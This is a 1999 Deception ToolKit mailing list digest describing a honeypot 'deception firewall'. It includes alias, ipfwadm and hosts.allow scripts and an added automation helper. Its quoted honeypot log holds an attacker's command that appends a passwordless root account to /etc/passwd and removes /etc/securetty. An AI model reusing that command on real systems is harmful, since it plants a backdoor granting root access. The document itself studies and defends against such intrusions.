From: dtk@all.net
Reply-to: dtk@all.net
Organization: Deception ToolKit Mailing List
Subject: DTK Mailing List 19990627
---------------------------------------------
From fred at all.net@all.net  Sun Jun 27 08:53:23 1999
Subject: The Deception Firewall with DTK
Date: Sun, 27 Jun 1999 08:53:13 -0700 (PDT)

I have been experimenting with the use of DTK to create large scale
deceptions and I thought the readers of the mailing list would be
interested in the preliminary results and how you can use deception as a
key component in a firewall - or as a large-scale detector.

I have done this for Redhat and Slackware Linux only.  If others care to
provide versions for non-linux boxes, please provide details to the
list. 

The goal is to provide deceptions for all unused computers and services
in a class C network (class B coming soon?) so that - from a single
Linux box - we can fill the address space, creating far higher odds of
hitting a deception.  We then (optionally) react to detections by making
everything a deception for that attacker for a period of time.  Here's
how it goes:

1) Make a list of all the IP addresses and legitimate outside services for
your class C network.

2) Configure a Linux box with 2 network cards - as a firewall in front
of the class C network of interest.

3) Configure and get DTK running on the firewall so that all outside
services run through DTK (via TCP wrappers).

4) Rig the Linux box so that it listens to all of the IP addresses in the
class C address range.  This is done by adding 253 entries to the
/etc/sysconfig/network-scripts directory - here's an approximate script
to do it:

CLASSC="10.0.0"
# one ifcfg alias file per host address in the class C (the original
# spelled the list 1 ... 254 out by hand; seq produces the same list)
for i in $(seq 1 254)
do
echo "DEVICE=eth0:${i}
IPADDR=${CLASSC}.${i}
NETMASK=255.255.255.0
NETWORK=${CLASSC}.0
BROADCAST=${CLASSC}.255
ONBOOT=yes" > /etc/sysconfig/network-scripts/ifcfg-eth0:${i}
echo -n "${i} "
done
echo "Done"

Note: I tried this for more than one class C and Linux is unable to
handle device names beyond <real-device>:[0-9][0-9][0-9] - pity - I was
anxious to do a class B network next.  I think this one can be fixed -
however.

5) Tunnel legitimate services through the firewall using netcat by
placing entries in the beginning of your /etc/hosts.allow file like this:

	telnet:	from-ip>to-ip:	twist /usr/local/bin/nc -w 3 <internal-IP> 23

Note 1: This assumes you have the version of tcp wrappers with the
fix for RedHat that allows the twist command to work properly and have
recompiled it with the proper options to allow the twist command to
operate properly.

Note 2: This assumes you have the specially modified version of
TCP-wrappers that allows you to determine the 'TO' address as well as
the 'FROM' address in your deliberations. We are working on one...

6) Use ipfwadm (or ipchains) to limit the services based on <from-ip> <to-ip>
pairs so that you only emulate the proper services for the proper IP addresses.
Here is an example script for a class C subset of the 10 net.

#!/bin/sh
# firewall script for deceptions

# count prints the integers from start to end, one per line; replace
# the calls below with explicit lists if you prefer
count() { seq "$1" "$2"; }

NT="`count 128 250`"
NTPORTS="123 124 125 80 12345 12346 31337"
UNIX="`count 1 63` `count 65 127`"
UNIXPORTS="11 17 21 22 23 25 80 110 365 512 1024 6000"
ANY="0.0.0.0/0"
ClassC="10.0.7"
RealIP="10.0.7.64"

echo -n "Init Firewall..."
/sbin/ipfwadm -I -f
/sbin/ipfwadm -O -f
/sbin/ipfwadm -F -f

echo -n "Forwarding Off..."
/sbin/ipfwadm -F -p deny

# default deny for all but the real IP address (a single host, /32; with a
# /24 here the whole class C would be accepted before the per-host rules below
# ever get a look, since ipfwadm takes the first matching rule)
/sbin/ipfwadm -I -p deny
/sbin/ipfwadm -I -a accept -S $ANY -D ${RealIP}/32 -W eth0

echo;echo -n "Doing NT..."
for i in $NT
do
	echo -n "$i "
	# only allow NT ports on NT emulators
	for j in $NTPORTS
	do
		/sbin/ipfwadm -I -P tcp -a accept -S $ANY -D ${ClassC}.${i} $j -W eth0
	done
	# the catch-all deny for this host goes after all of its accept rules;
	# appended inside the port loop it would block every port but the first
	/sbin/ipfwadm -I -P tcp -a deny -S $ANY -D ${ClassC}.${i} -W eth0
done
echo;echo -n "Doing Unix..."
for i in $UNIX
do
	echo -n "$i "
	# only allow Unix ports on Unix emulators
	for j in $UNIXPORTS
	do
		/sbin/ipfwadm -I -P tcp -a accept -S $ANY -D ${ClassC}.${i} $j -W eth0
	done
	/sbin/ipfwadm -I -P all -a deny -S $ANY -D ${ClassC}.${i} -W eth0
done
echo;echo "Deception firewalling done"

7) Rig the deception scripts (####.response) so that whenever you get a
detection at infocon 3 or above (set your own level if you like), you
add a line to the start of /etc/hosts.allow to cover the tunnels placed
in step 5 above with deceptions from the source addresses of the probes.
This can be done with DTK's 'special' operator.

The net effect is a network with the following properties:

1) The address space and the service space is fully populated, so that
anything they try seems to be available for use.

2) Whenever they probe more deeply, the odds are heavily in favor of
hitting a forged service - assuming they do not have detailed knowledge
of the network.

3) When they try to hit a forged service beyond a light scan (you set
the level), no legitimate services remain and the whole network becomes
a deception.

4) You automatically correlate all attempts across the whole class C
network and automatically and (just about) instantly respond to any deep
probe.

5) Legitimate services continue unhindered in any way.  Indeed, the
firewall tends to prevent otherwise successful denial of service attacks
against many of these machines. 

I've been testing this and it seems to work for now. Today - a class
B network - tomorrow - the whole Internet deception!!!

FC

========================================================================
Also from the latest dtk logs...

'198.143.200.52', '13392', '10752', '1999/06/24 17:37:35', '18023', '275', '1', 'listen.pl', 'S0', 'R-Peace', 'Init'
'198.143.200.52', '13392', '10752', '1999/06/24 17:37:36', '18023', '275', '1', 'listen.pl', 'S', 'RPeace-Peace', 'trap '' SIGALRM SIGTRAP'
'198.143.200.52', '13392', '10752', '1999/06/24 17:37:36', '18023', '275', '1', 'listen.pl', 'S', 'RPeace-Peace', 'PATH=/usr/local/bin:/bin:/usr/bin:/sbin:/usr/sbin;export PATH'
'198.143.200.52', '13392', '10752', '1999/06/24 17:37:36', '18023', '275', '1', 'listen.pl', 'S', 'RPeace-Peace', '/usr/sbin/rpc.mountd </dev/null'
'198.143.200.52', '13392', '10752', '1999/06/24 17:37:36', '18023', '275', '1', 'listen.pl', 'S', 'RPeace-Peace', '/bin/uname -a;/usr/bin/id;echo 'moof::0:0::/:/bin/bash' >>/etc/passwd;rm -rf /etc/securetty;exit;'

Then...

'209.24.217.162', '23', '23', '1999/06/27 00:59:35', '19648', '19648', '1', 'Telnet.pl', 'S0', 'R-Peace', ''
'209.24.217.162', '23', '23', '1999/06/27 00:59:38', '19648', '19648', '1', 'Telnet.pl', 'S1', 'RPeace-Peace', 'moof'
'38.29.35.116', '23', '23', '1999/06/28 13:58:29', '24863', '24863', '1', 'Telnet.pl', 'S0', 'R-Peace', ''
'38.29.35.116', '23', '23', '1999/06/28 13:58:31', '24863', '24863', '1', 'Telnet.pl', 'S1', 'RPeace-Peace', 'moof'

I have rigged moof to allow apparent entry - and am considering putting
up a special box just to see what they do once they break in.

FC
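The reaction in step 7 - making every service a deception for a probing
source "for a period of time" - is the part the post leaves to the reader's
####.response scripts.  The following is an added example, written for this
digest and not code from the post or from DTK: a small /bin/sh helper that
prepends a catch-all hosts.allow line for the source address of a probe,
records an expiry, and later removes the line again so the step 5 tunnels
come back.  The twist target (/usr/local/dtk/listen.pl), the state file
(/var/run/dtk-deceived), the one-hour period and the infocon threshold are
assumptions; set them from the environment to match your own DTK install.
The source address is read from the first quoted field of a DTK log record,
which is where the log lines above carry the probing host.

```shell
#!/bin/sh
# Added example for step 7 (not from the DTK list post or from DTK itself):
# on a deep probe, make every wrapped service a deception for the probing
# address, and undo that after a fixed period.  File locations, the twist
# target and the state file are assumptions.

HOSTS_ALLOW="${HOSTS_ALLOW:-/etc/hosts.allow}"              # read by tcp wrappers
DECEPTION_CMD="${DECEPTION_CMD:-/usr/local/dtk/listen.pl}"  # assumed DTK listener path
STATE="${STATE:-/var/run/dtk-deceived}"                      # assumed: "addr expiry" per line
TTL="${TTL:-3600}"               # seconds a source stays fully deceived
INFOCON_MIN="${INFOCON_MIN:-3}"  # react at infocon 3 or above, as in the post

# Accept only a plain dotted quad: the address comes straight out of attacker
# traffic and is about to be written into a configuration file.
valid_ip() {
    printf '%s\n' "$1" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$' || return 1
    old_ifs=$IFS; IFS=.; set -- $1; IFS=$old_ifs
    for octet in "$@"; do [ "$octet" -le 255 ] || return 1; done
}

# The source address is the first single-quoted field of a DTK log record
# (compare the log lines quoted in the post).
src_from_log_line() {
    printf '%s\n' "$1" | sed -n "s/^'\([^']*\)',.*/\1/p"
}

# True if the address is currently in the fully-deceived set.
is_deceived() {
    [ -f "$STATE" ] && awk -v s="$1" '$1 == s { f = 1 } END { exit !f }' "$STATE"
}

# Prepend a hosts.allow line sending every service for this source to DTK.
# tcp wrappers uses the first matching line, so the new line must sit above
# the "twist nc" tunnel lines from step 5; those then never match for $src.
deceive_source() {
    src="$1"; now="${2:-$(date +%s)}"
    valid_ip "$src" || { echo "deceive_source: rejected '$src'" >&2; return 1; }
    until=$((now + TTL))
    if is_deceived "$src"; then
        # Already covered: only push the expiry out, no duplicate line.
        awk -v s="$src" -v u="$until" '$1 == s { $2 = u } { print }' "$STATE" \
            > "$STATE.tmp" && mv "$STATE.tmp" "$STATE"
        return 0
    fi
    [ -f "$HOSTS_ALLOW" ] || : > "$HOSTS_ALLOW"
    { echo "ALL: $src: twist $DECEPTION_CMD"; cat "$HOSTS_ALLOW"; } > "$HOSTS_ALLOW.tmp" \
        && mv "$HOSTS_ALLOW.tmp" "$HOSTS_ALLOW" \
        && echo "$src $until" >> "$STATE"
}

# Remove the deception line (restoring the tunnels) for every source whose
# period has run out; meant to be run from cron.
expire_sources() {
    now="${1:-$(date +%s)}"
    [ -f "$STATE" ] || return 0
    awk -v now="$now" '$2 <= now { print $1 }' "$STATE" | while read -r src; do
        grep -Fv "ALL: $src: twist $DECEPTION_CMD" "$HOSTS_ALLOW" > "$HOSTS_ALLOW.tmp" || true
        mv "$HOSTS_ALLOW.tmp" "$HOSTS_ALLOW"
    done
    awk -v now="$now" '$2 > now' "$STATE" > "$STATE.tmp" && mv "$STATE.tmp" "$STATE"
}

# Entry point for a ####.response script: pass the DTK log record and the
# infocon level DTK assigned to it; below the threshold nothing changes.
react_to_probe() {
    record="$1"; infocon="$2"
    [ "$infocon" -ge "$INFOCON_MIN" ] || return 0
    deceive_source "$(src_from_log_line "$record")"
}
```

Source this file from the response script and call react_to_probe with the
log record and its infocon level; run expire_sources from cron every few
minutes.  The state file is kept separate from hosts.allow on purpose, so
that the line tcp wrappers reads stays a plain, predictable one-liner and
the expiry bookkeeping never has to be parsed back out of it.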
---------------------------------------------
